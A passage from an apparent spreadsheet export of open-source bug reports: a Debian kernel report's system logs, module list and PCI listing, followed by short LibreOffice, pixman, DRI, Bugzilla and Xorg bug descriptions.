[236124.855931] parport_pc 00:0a: activated
[236124.856716] sd 0:0:0:0: [sda] Starting disk
[236124.916226] ata3: SATA link down (SStatus 0 SControl 300)
[236124.924228] ata1: SATA link up 3.0 Gbps (SStatus 123 SControl 300)
[236125.047054] ata1.00: configured for UDMA/133
[236125.065585] do_drive_get_GTF: Run _GTF error: status = 0x5
[236125.067596] hda: host max PIO4 wanted PIO255(auto-tune) selected PIO4
[236125.069097] hda: UDMA/33 mode selected
[236125.308242] firewire_core: rediscovered device fw0
[236126.388226] usb 2-2: reset full speed USB device using uhci_hcd and address 2
[236126.559279] btusb 2-2:1.0: no reset_resume for driver btusb?
[236126.559283] btusb 2-2:1.1: no reset_resume for driver btusb?
[236126.976223] usb 7-1: reset full speed USB device using uhci_hcd and address 2
[236127.469281] usb 7-1.2: reset full speed USB device using uhci_hcd and address 3
[236127.576326] pci 0000:00:02.0: restoring config space at offset 0x1 (was 0x900407 writing 0x900403)
[236127.576347] pci 0000:00:02.0: setting latency timer to 64
[236127.663974] Restarting tasks ... done.
[236129.520636] tg3 0000:09:00.0: PME# disabled
[236129.520762] tg3 0000:09:00.0: irq 30 for MSI/MSI-X
[236129.586504] ADDRCONF(NETDEV_UP): eth0: link is not ready
[236129.819097] Registered led device: iwl-phy1::radio
[236129.819120] Registered led device: iwl-phy1::assoc
[236129.819140] Registered led device: iwl-phy1::RX
[236129.819162] Registered led device: iwl-phy1::TX
[236129.888421] ADDRCONF(NETDEV_UP): eth1: link is not ready
[236129.903925] eth1: direct probe to AP e2:4d:2b:0b:56:d2 try 1
[236129.911769] eth1 direct probe responded
[236129.911773] eth1: authenticate with AP e2:4d:2b:0b:56:d2
[236129.915523] eth1: authenticated
[236129.915527] eth1: associate with AP e2:4d:2b:0b:56:d2
[236130.112044] eth1: associate with AP e2:4d:2b:0b:56:d2
[236130.312118] eth1: associate with AP e2:4d:2b:0b:56:d2
[236130.515558] eth1: association with AP e2:4d:2b:0b:56:d2 timed out
[236140.402110] eth1: authenticate with AP 00:1d:6a:83:f5:ff
[236140.404097] eth1: authenticated
[236140.404101] eth1: associate with AP 00:1d:6a:83:f5:ff
[236140.406788] eth1: RX AssocResp from 00:1d:6a:83:f5:ff (capab=0x431 status=0 aid=2)
[236140.406793] eth1: associated
[236140.430791] ADDRCONF(NETDEV_CHANGE): eth1: link becomes ready
[236150.656023] eth1: no IPv6 routers present
[236799.604055] eth1: no probe response from AP 00:1d:6a:83:f5:ff - disassociating
[236892.687465] eth1: authenticate with AP 00:1d:6a:83:f5:ff
[236892.690166] eth1: authenticated
[236892.690172] eth1: associate with AP 00:1d:6a:83:f5:ff
[236892.696039] eth1: RX AssocResp from 00:1d:6a:83:f5:ff (capab=0x431 status=0 aid=1)
[236892.696046] eth1: associated
** Loaded modules:
Module                  Size  Used by
snd_usb_audio          91440  0 
snd_usb_lib            16640  1 snd_usb_audio
pwc                    79952  0 
videodev               37216  1 pwc
v4l1_compat            12964  1 videodev
v4l2_compat_ioctl32     9344  1 videodev
iwlagn                 84960  0 
tg3                   100388  0 
tun                    14976  2 
binfmt_misc             9292  1 
i915                  207368  2 
drm                   174640  3 i915
i2c_algo_bit            5988  1 i915
ppdev                   7272  0 
lp                     10708  0 
bridge                 48208  0 
stp                     2900  1 bridge
bnep                   13776  2 
sco                    11028  2 
rfcomm                 36016  4 
l2cap                  21152  16 bneprfcomm
nfsd                  269520  9 
lockd                  68372  1 nfsd
nfs_acl                 3296  1 nfsd
auth_rpcgss            40960  1 nfsd
sunrpc                198632  8 nfsdlockdnfs_aclauth_rpcgss
exportfs                4656  1 nfsd
kvm_intel              46520  0 
kvm                   160600  1 kvm_intel
acpi_cpufreq            8912  0 
cpufreq_conservative     7856  0 
cpufreq_stats           4692  0 
cpufreq_userspace       3652  0 
cpufreq_powersave       1824  0 
microcode              25208  0 
fuse                   60224  3 
usbhid                 37472  0 
hid                    41392  1 usbhid
dm_crypt               13144  0 
coretemp                6688  0 
loop                   16012  0 
firewire_sbp2          15568  0 
btusb                  12884  2 
bluetooth              55604  9 bnepscorfcomml2capbtusb
ide_cd_mod             28600  0 
cdrom                  34376  1 ide_cd_mod
ide_pci_generic         4996  0 
snd_hda_codec_idt      63904  1 
ata_generic             5972  0 
arc4                    2080  2 
ecb                     3104  2 
iwlcore               111264  1 iwlagn
snd_hda_intel          27656  4 
snd_hda_codec          75952  2 snd_hda_codec_idtsnd_hda_intel
led_class               5080  1 iwlcore
snd_hwdep               8232  2 snd_usb_audiosnd_hda_codec
snd_pcm_oss            37232  0 
snd_mixer_oss          15104  1 snd_pcm_oss
mac80211              139488  2 iwlagniwlcore
snd_pcm                79448  5 snd_usb_audiosnd_hda_intelsnd_hda_codecsnd_pcm_oss
snd_seq_midi            7008  0 
snd_rawmidi            23136  2 snd_usb_libsnd_seq_midi
snd_seq_midi_event      7744  1 snd_seq_midi
snd_seq                51360  2 snd_seq_midisnd_seq_midi_event
snd_timer              21904  3 snd_pcmsnd_seq
pcmcia                 27416  0 
snd_seq_device          7508  3 snd_seq_midisnd_rawmidisnd_seq
cfg80211               89848  3 iwlagniwlcoremac80211
dell_laptop             3944  0 
snd                    64424  18 snd_usb_audiosnd_hda_codec_idtsnd_hda_intelsnd_hda_codecsnd_hwdepsnd_pcm_osssnd_mixer_osssnd_pcmsnd_rawmidisnd_seqsnd_timersnd_seq_device
rfkill                 20552  3 bluetoothcfg80211dell_laptop
firewire_ohci          22516  0 
yenta_socket           24972  1 
video                  22204  1 i915
libphy                 25312  1 tg3
intel_agp              29104  1 
processor              40188  3 acpi_cpufreq
firewire_core          47960  2 firewire_sbp2firewire_ohci
output                  3520  1 video
rsrc_nonstatic         10256  1 yenta_socket
soundcore               8160  1 snd
uhci_hcd               22256  0 
ehci_hcd               34432  0 
crc_itu_t               2752  1 firewire_core
pcmcia_core            37108  3 pcmciayenta_socketrsrc_nonstatic
wmi                     7520  0 
snd_page_alloc          9952  2 snd_hda_intelsnd_pcm
i2c_i801               10432  0 
piix                    7432  0 
i2c_core               24448  5 videodevi915drmi2c_algo_biti2c_i801
dcdbas                  8560  1 dell_laptop
ide_core              106592  3 ide_cd_modide_pci_genericpiix
serio_raw               5908  0 
button                  6544  0 
parport_pc             27256  1 
psmouse                42396  0 
evdev                  10480  15 
parport                38304  3 ppdevlpparport_pc
battery                 7664  0 
joydev                 10976  0 
ac                      3760  0 
ext3                  122304  6 
jbd                    48456  1 ext3
mbcache                 8836  1 ext3
dm_mod                 68584  21 dm_crypt
sd_mod                 34728  4 
crc_t10dif              2128  1 sd_mod
thermal                15968  0 
fan                     5272  0 
thermal_sys            16496  4 videoprocessorthermalfan
ahci                   39408  3 
libata                176076  2 ata_genericahci
scsi_mod              160320  3 firewire_sbp2sd_modlibata
** PCI devices:
00:00.0 Host bridge [0600]: Intel Corporation Mobile PM965/GM965/GL960 Memory Controller Hub [8086:2a00] (rev 0c)
	Subsystem: Dell Device [1028:01f9]
	Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx-
	Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- SERR- &lt;PERR- INTx-
	Latency: 0
	Capabilities: 
	Kernel driver in use: agpgart-intel
00:02.0 VGA compatible controller [0300]: Intel Corporation Mobile GM965/GL960 Integrated Graphics Controller [8086:2a02] (rev 0c) (prog-if 00 [VGA controller])
	Subsystem: Dell Latitude D630 [1028:01f9]
	Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx+
	Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- SERR- &lt;PERR- INTx-
	Latency: 0
	Interrupt: pin A routed to IRQ 29
	Region 0: Memory at f6e00000 (64-bit non-prefetchable) [size=1M]
	Region 2: Memory at e0000000 (64-bit prefetchable) [size=256M]
	Region 4: I/O ports at eff8 [size=8]
	Expansion ROM at  [disabled]
	Capabilities: 
00:02.1 Display controller [0380]: Intel Corporation Mobile GM965/GL960 Integrated Graphics Controller [8086:2a03] (rev 0c)
	Subsystem: Dell Device [1028:01f9]
	Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx-
	Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- SERR- &lt;PERR- INTx-
	Latency: 0
	Region 0: Memory at f6f00000 (64-bit non-prefetchable) [size=1M]
	Capabilities: 
00:1a.0 USB Controller [0c03]: Intel Corporation 82801H (ICH8 Family) USB UHCI Controller #4 [8086:2834] (rev 02) (prog-if 00 [UHCI])
	Subsystem: Dell Device [1028:01f9]
	Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx-
	Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- SERR- &lt;PERR- INTx-
	Latency: 0
	Interrupt: pin A routed to IRQ 20
	Region 4: I/O ports at 6f20 [size=32]
	Kernel driver in use: uhci_hcd
00:1a.1 USB Controller [0c03]: Intel Corporation 82801H (ICH8 Family) USB UHCI Controller #5 [8086:2835] (rev 02) (prog-if 00 [UHCI])
	Subsystem: Dell Device [1028:01f9]
	Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx-
	Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- SERR- &lt;PERR- INTx-
	Latency: 0
	Interrupt: pin B routed to IRQ 21
	Region 4: I/O ports at 6f00 [size=32]
	Kernel driver in use: uhci_hcd
00:1a.7 USB Controller [0c03]: Intel Corporation 82801H (ICH8 Family) USB2 EHCI Controller #2 [8086:283a] (rev 02) (prog-if 20 [EHCI])
	Subsystem: Dell Device [1028:01f9]
	Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx-
	Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- SERR- &lt;PERR- INTx-
	Latency: 0
	Interrupt: pin C routed to IRQ 22
	Region 0: Memory at fed1c400 (32-bit non-prefetchable) [size=1K]
	Capabilities: 
	Kernel driver in use: ehci_hcd
00:1b.0 Audio device [0403]: Intel Corporation 82801H (ICH8 Family) HD Audio Controller [8086:284b] (rev 02)
	Subsystem: Dell Dell Latitude D630 [1028:01f9]
	Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx-
	Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- SERR- &lt;PERR- INTx-
	Latency: 0 Cache Line Size: 64 bytes
	Interrupt: pin A routed to IRQ 21
	Region 0: Memory at f6dfc000 (64-bit non-prefetchable) [size=16K]
	Capabilities: 
	Kernel driver in use: HDA Intel
00:1c.0 PCI bridge [0604]: Intel Corporation 82801H (ICH8 Family) PCI Express Port 1 [8086:283f] (rev 02) (prog-if 00 [Normal decode])
	Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx+
	Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- SERR- &lt;PERR- INTx-
	Latency: 0 Cache Line Size: 64 bytes
	Bus: primary=00 secondary=0b subordinate=0b sec-latency=0
	Secondary status: 66MHz- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort+ &lt;SERR- &lt;PERR-
	BridgeCtl: Parity- SERR+ NoISA- VGA- MAbort- &gt;Reset- FastB2B-
		PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn-
	Capabilities: 
	Kernel driver in use: pcieport-driver
00:1c.1 PCI bridge [0604]: Intel Corporation 82801H (ICH8 Family) PCI Express Port 2 [8086:2841] (rev 02) (prog-if 00 [Normal decode])
	Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx+
	Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- SERR- &lt;PERR- INTx-
	Latency: 0 Cache Line Size: 64 bytes
	Bus: primary=00 secondary=0c subordinate=0c sec-latency=0
	Memory behind bridge: f6c00000-f6cfffff
	Secondary status: 66MHz- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &lt;SERR- &lt;PERR-
	BridgeCtl: Parity- SERR+ NoISA- VGA- MAbort- &gt;Reset- FastB2B-
		PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn-
	Capabilities: 
	Kernel driver in use: pcieport-driver
00:1c.5 PCI bridge [0604]: Intel Corporation 82801H (ICH8 Family) PCI Express Port 6 [8086:2849] (rev 02) (prog-if 00 [Normal decode])
	Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx+
	Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- SERR- &lt;PERR- INTx-
	Latency: 0 Cache Line Size: 64 bytes
	Bus: primary=00 secondary=09 subordinate=09 sec-latency=0
	Memory behind bridge: f6b00000-f6bfffff
	Secondary status: 66MHz- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &lt;SERR- &lt;PERR-
	BridgeCtl: Parity- SERR+ NoISA- VGA- MAbort- &gt;Reset- FastB2B-
		PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn-
	Capabilities: 
	Kernel driver in use: pcieport-driver
00:1d.0 USB Controller [0c03]: Intel Corporation 82801H (ICH8 Family) USB UHCI Controller #1 [8086:2830] (rev 02) (prog-if 00 [UHCI])
	Subsystem: Dell Device [1028:01f9]
	Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx-
	Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- SERR- &lt;PERR- INTx-
	Latency: 0
	Interrupt: pin A routed to IRQ 20
	Region 4: I/O ports at 6f80 [size=32]
	Kernel driver in use: uhci_hcd
00:1d.1 USB Controller [0c03]: Intel Corporation 82801H (ICH8 Family) USB UHCI Controller #2 [8086:2831] (rev 02) (prog-if 00 [UHCI])
	Subsystem: Dell Device [1028:01f9]
	Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx-
	Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- SERR- &lt;PERR- INTx-
	Latency: 0
	Interrupt: pin B routed to IRQ 21
	Region 4: I/O ports at 6f60 [size=32]
	Kernel driver in use: uhci_hcd
00:1d.2 USB Controller [0c03]: Intel Corporation 82801H (ICH8 Family) USB UHCI Controller #3 [8086:2832] (rev 02) (prog-if 00 [UHCI])
	Subsystem: Dell Device [1028:01f9]
	Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx-
	Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- SERR- &lt;PERR- INTx-
	Latency: 0
	Interrupt: pin C routed to IRQ 22
	Region 4: I/O ports at 6f40 [size=32]
	Kernel driver in use: uhci_hcd
00:1d.7 USB Controller [0c03]: Intel Corporation 82801H (ICH8 Family) USB2 EHCI Controller #1 [8086:2836] (rev 02) (prog-if 20 [EHCI])
	Subsystem: Dell Device [1028:01f9]
	Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx-
	Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- SERR- &lt;PERR- INTx-
	Latency: 0
	Interrupt: pin A routed to IRQ 20
	Region 0: Memory at fed1c000 (32-bit non-prefetchable) [size=1K]
	Capabilities: 
	Kernel driver in use: ehci_hcd
00:1e.0 PCI bridge [0604]: Intel Corporation 82801 Mobile PCI Bridge [8086:2448] (rev f2) (prog-if 01 [Subtractive decode])
	Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx-
	Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- SERR- &lt;PERR- INTx-
	Latency: 0
	Bus: primary=00 secondary=03 subordinate=07 sec-latency=32
	I/O behind bridge: 00002000-00002fff
	Memory behind bridge: f6a00000-f6afffff
	Prefetchable memory behind bridge: 00000000f0000000-00000000f3ffffff
	Secondary status: 66MHz- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort+ &lt;SERR- &lt;PERR+
	BridgeCtl: Parity- SERR+ NoISA- VGA- MAbort- &gt;Reset- FastB2B-
		PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn-
	Capabilities: 
00:1f.0 ISA bridge [0601]: Intel Corporation 82801HEM (ICH8M) LPC Interface Controller [8086:2815] (rev 02)
	Subsystem: Dell Device [1028:01f9]
	Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx-
	Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- SERR- &lt;PERR- INTx-
	Latency: 0
	Capabilities: 
00:1f.1 IDE interface [0101]: Intel Corporation 82801HBM/HEM (ICH8M/ICH8M-E) IDE Controller [8086:2850] (rev 02) (prog-if 8a [Master SecP PriP])
	Subsystem: Dell Device [1028:01f9]
	Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx-
	Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- SERR- &lt;PERR- INTx-
	Latency: 0
	Interrupt: pin A routed to IRQ 16
	Region 0: I/O ports at 01f0 [size=8]
	Region 1: I/O ports at 03f4 [size=1]
	Region 2: I/O ports at 0170 [size=8]
	Region 3: I/O ports at 0374 [size=1]
	Region 4: I/O ports at 6fa0 [size=16]
	Kernel driver in use: PIIX_IDE
00:1f.2 SATA controller [0106]: Intel Corporation 82801HBM/HEM (ICH8M/ICH8M-E) SATA AHCI Controller [8086:2829] (rev 02) (prog-if 01 [AHCI 1.0])
	Subsystem: Dell Device [1028:01f9]
	Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx+
	Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- SERR- &lt;PERR- INTx-
	Latency: 0
	Interrupt: pin C routed to IRQ 27
	Region 0: I/O ports at 6eb0 [size=8]
	Region 1: I/O ports at 6eb8 [size=4]
	Region 2: I/O ports at 6ec0 [size=8]
	Region 3: I/O ports at 6ec8 [size=4]
	Region 4: I/O ports at 6ee0 [size=32]
	Region 5: Memory at f6dfb800 (32-bit non-prefetchable) [size=2K]
	Capabilities: 
	Kernel driver in use: ahci
00:1f.3 SMBus [0c05]: Intel Corporation 82801H (ICH8 Family) SMBus Controller [8086:283e] (rev 02)
	Subsystem: Dell Device [1028:01f9]
	Control: I/O+ Mem+ BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx-
	Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- SERR- &lt;PERR- INTx-
	Interrupt: pin B routed to IRQ 17
	Region 0: Memory at f6dfb700 (32-bit non-prefetchable) [size=256]
	Region 4: I/O ports at 10c0 [size=32]
	Kernel driver in use: i801_smbus
03:01.0 CardBus bridge [0607]: O2 Micro Inc. Cardbus bridge [1217:7135] (rev 21)
	Subsystem: Dell Device [1028:01f9]
	Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping+ SERR- FastB2B- DisINTx-
	Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=slow &gt;TAbort- SERR- &lt;PERR- INTx-
	Latency: 168
	Interrupt: pin A routed to IRQ 19
	Region 0: Memory at f6a00000 (32-bit non-prefetchable) [size=4K]
	Bus: primary=03 secondary=04 subordinate=07 sec-latency=176
	Memory window 0: f0000000-f3fff000 (prefetchable)
	Memory window 1: f4000000-f43ff000
	I/O window 0: 00002000-000020ff
	I/O window 1: 00002400-000024ff
	BridgeCtl: Parity- SERR- ISA- VGA- MAbort- &gt;Reset+ 16bInt+ PostWrite+
	16-bit legacy interface ports at 0001
	Kernel driver in use: yenta_cardbus
03:01.4 FireWire (IEEE 1394) [0c00]: O2 Micro Inc. Firewire (IEEE 1394) [1217:00f7] (rev 02) (prog-if 10 [OHCI])
	Subsystem: Dell Device [1028:01f9]
	Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx-
	Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- SERR- &lt;PERR- INTx+
	Latency: 64 Cache Line Size: 64 bytes
	Interrupt: pin A routed to IRQ 19
	Region 0: Memory at f6aff000 (32-bit non-prefetchable) [size=4K]
	Region 1: Memory at f6afe800 (32-bit non-prefetchable) [size=2K]
	Capabilities: 
	Kernel driver in use: firewire_ohci
09:00.0 Ethernet controller [0200]: Broadcom Corporation NetXtreme BCM5755M Gigabit Ethernet PCI Express [14e4:1673] (rev 02)
	Subsystem: Dell Device [1028:01f9]
	Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx+
	Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- SERR- &lt;PERR- INTx-
	Latency: 0 Cache Line Size: 64 bytes
	Interrupt: pin A routed to IRQ 30
	Region 0: Memory at f6bf0000 (64-bit non-prefetchable) [size=64K]
	Expansion ROM at  [disabled]
	Capabilities: 
	Kernel driver in use: tg3
0c:00.0 Network controller [0280]: Intel Corporation PRO/Wireless 4965 AG or AGN [Kedron] Network Connection [8086:4229] (rev 61)
	Subsystem: Intel Corporation Device [8086:1121]
	Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx+
	Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- SERR- &lt;PERR- INTx-
	Latency: 0 Cache Line Size: 64 bytes
	Interrupt: pin A routed to IRQ 28
	Region 0: Memory at f6cfe000 (64-bit non-prefetchable) [size=8K]
	Capabilities: 
	Kernel driver in use: iwlagn
-- System Information:
Debian Release: squeeze/sid
  APT prefers oldstable
  APT policy: (500 'oldstable') (500 'unstable') (500 'testing') (500 'stable') (1 'experimental')
Architecture: amd64 (x86_64)
Kernel: Linux 2.6.31-rc6-amd64 (SMP w/2 CPU cores)
Locale: LANG=fr_FR.UTF-8 LC_CTYPE=fr_FR.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash
Versions of packages linux-image-2.6.31-rc6-amd64 depends on:
ii  debconf [debconf-2.0]         1.5.27     Debian configuration management sy
ii  initramfs-tools [linux-initra 0.93.4     tools for generating an initramfs
ii  module-init-tools             3.10-3     tools for managing Linux kernel mo
Versions of packages linux-image-2.6.31-rc6-amd64 recommends:
ii      2.6.31~rc6-1~experimental.1~snapshot Binary firmware for various driver
Versions of packages linux-image-2.6.31-rc6-amd64 suggests:
ii  grub-pc [grub]           1.96+20090829-1 GRand Unified Bootloader version 
pn  linux-doc-2.6.31                   (no description available)
-- debconf information:
  linux-image-2.6.31-rc6-amd64/postinst/depmod-error-initrd-2.6.31-rc6-amd64: false
  linux-image-2.6.31-rc6-amd64/prerm/removing-running-kernel-2.6.31-rc6-amd64: true
  shared/kernel-image/really-run-bootloader: true
  linux-image-2.6.31-rc6-amd64/postinst/bootloader-test-error-2.6.31-rc6-amd64:
  linux-image-2.6.31-rc6-amd64/preinst/initrd-2.6.31-rc6-amd64:
  linux-image-2.6.31-rc6-amd64/postinst/bootloader-error-2.6.31-rc6-amd64:
  linux-image-2.6.31-rc6-amd64/prerm/would-invalidate-boot-loader-2.6.31-rc6-amd64: true
  linux-image-2.6.31-rc6-amd64/postinst/missing-firmware-2.6.31-rc6-amd64:</t>
  </si>
  <si>
    <t>vdanjean</t>
  </si>
  <si>
    <t>LIBREOFFICE-68839</t>
  </si>
  <si>
    <t>ODF import: counter (like 1) added to picture names</t>
  </si>
  <si>
    <t>Created attachment 85053
sample file which shows the pic names change.
Description:
When insert a picture into a odt file apply the pic a name and save when reopen an extra 1 was added to the name.
Steps to reproduce:
1. Create a new odt file and insert two pictures (or you can just open the attached file)
2. give names to the pictures (right click-&gt;picture-&gt;option-&gt;name pic for the 1st pic and pic2 for the 2nd pic) and save
3. open the file again names for the two pics become pic1 and pic21 respectively
4. do some edit to the file and save open again names for the two pics become pic11 and pic211
5. repeate step 4 more 1 will be added.
result expected:
names for the pics should always be pic and pic2.
This bug exists in LibreOffice 4.0.5.2 and 4.1.1.2. Not tested in 3.X may be a regression.</t>
  </si>
  <si>
    <t>PAPYON-27987</t>
  </si>
  <si>
    <t>Email subject is not decoded</t>
  </si>
  <si>
    <t>Email subject should be decoded from its mbox encoding</t>
  </si>
  <si>
    <t>DRI-101025</t>
  </si>
  <si>
    <t>Initialization message shown twice</t>
  </si>
  <si>
    <t>Created attachment 131341
journalctl -k -o short-precise
The Linux kernel is built from the current master branch.
```
$ git log --oneline -1
deac8429d62c Merge tag 'sound-fix-4.12-rc1' of git://git.kernel.org/pub/scm/linux/kernel/git/tiwai/sound
```
On the Lenovo X60t the initalization message is shown twice.
```
Mai 12 23:12:38.988698 lenovox60 kernel: [drm] Initialized i915 1.6.0 20170403 for 0000:00:02.0 on minor 0
Mai 12 23:12:38.988781 lenovox60 kernel: [drm] Initialized i915 1.6.0 20170403 for 0000:00:02.0 on minor 0
```
```
$ lspci -s 00:02.0 -nn
00:02.0 VGA compatible controller [0300]: Intel Corporation Mobile 945GM/GMS 943/940GML Express Integrated Graphics Controller [8086:27a2] (rev 03)
```
Is that correct?</t>
  </si>
  <si>
    <t>LIBREOFFICE-85304</t>
  </si>
  <si>
    <t>Reference of cell name modified after deletion of cell range</t>
  </si>
  <si>
    <t>Created attachment 108213
Cell name reference is in B1 moved to A1 if delete A2:A4 with shift left
Description: when deleting zone and shifting left (not deleting entire column) references to cell names are modified even if they should not shift.
Steps to reproduce:
1. Create a new spreadsheet
2. In B1 Insert &gt; Names &gt; Define
3. Enter a name and validate with Add (see attachment)
4. Select A2:A4 right click &gt; Delete... &gt; Shift cells left
5. Ctrl+F3 to manage names
Expected behavior:
Reference to name should be unchanged in B1 because shifting left concerns only row 2 to 4 and not row 1 where name is referenced.
Observed behavior:
Reference to name is now A1.
Reproduce with:
- Version: 4.2.0.4
Build ID: 05dceb5d363845f2cf968344d7adab8dcfb2ba71
- Version: 4.3.3.1
Build ID: 7d55112667c8fcddb67bc3803796b46c93aa56b0
- Version: 4.4.0.0.alpha1+
Build ID: a8c24b25fd9fb21097a08a22797bf61b59099ea1
TinderBox: Win-x86@42 Branch:master Time: 2014-10-21_06:31:17
NOT reproduce with:
- Version: 4.1.6.2
Build ID: 40ff705089295be5be0aae9b15123f687c05b0a</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-30491</t>
  </si>
  <si>
    <t>bugzilla misdetects attachment type</t>
  </si>
  <si>
    <t>The plain text configure log attached to bugs #30490 and #30489 is tagged as application/octet-stream by bugzilla.</t>
  </si>
  <si>
    <t>PIXMAN-42588</t>
  </si>
  <si>
    <t>pixman configure use non POSIX test</t>
  </si>
  <si>
    <t>pixman configure.ac file has the following line which is a non POSIX test construction.
   test $test_CFLAGS ==  &amp;&amp;         \
Please fix the line to work on POSIX shells like
   test z$test_CFLAGS = z &amp;&amp;         \
or such.</t>
  </si>
  <si>
    <t>naota</t>
  </si>
  <si>
    <t>XORG-97956</t>
  </si>
  <si>
    <t>Logitech G933  Gaming Wireless Headset: BUG: triggered 'if (axnum &gt;= dev-&gt;valuator-&gt;numAxes)'</t>
  </si>
  <si>
    <t>Created attachment 126820
evemu-describe for Logitech G933
I am seeing the same problem as in bug 89473
[    16.196] (**) Logitech Logitech G933 Gaming Wireless Headset: always reports core events
[    16.196] (**) evdev: Logitech Logitech G933 Gaming Wireless Headset: Device: /dev/input/event14
[    16.196] (--) evdev: Logitech Logitech G933 Gaming Wireless Headset: Vendor 0x46d Product 0xa5b
[    16.196] (--) evdev: Logitech Logitech G933 Gaming Wireless Headset: Found absolute axes
[    16.196] (--) evdev: Logitech Logitech G933 Gaming Wireless Headset: Found absolute multitouch axes
[    16.196] (II) evdev: Logitech Logitech G933 Gaming Wireless Headset: No buttons found faking one.
[    16.196] (--) evdev: Logitech Logitech G933 Gaming Wireless Headset: Fake MT device detected
[    16.196] (--) evdev: Logitech Logitech G933 Gaming Wireless Headset: Found keys
[    16.196] (II) evdev: Logitech Logitech G933 Gaming Wireless Headset: Forcing relative x/y axes to exist.
[    16.196] (II) evdev: Logitech Logitech G933 Gaming Wireless Headset: Configuring as mouse
[    16.196] (II) evdev: Logitech Logitech G933 Gaming Wireless Headset: Configuring as keyboard
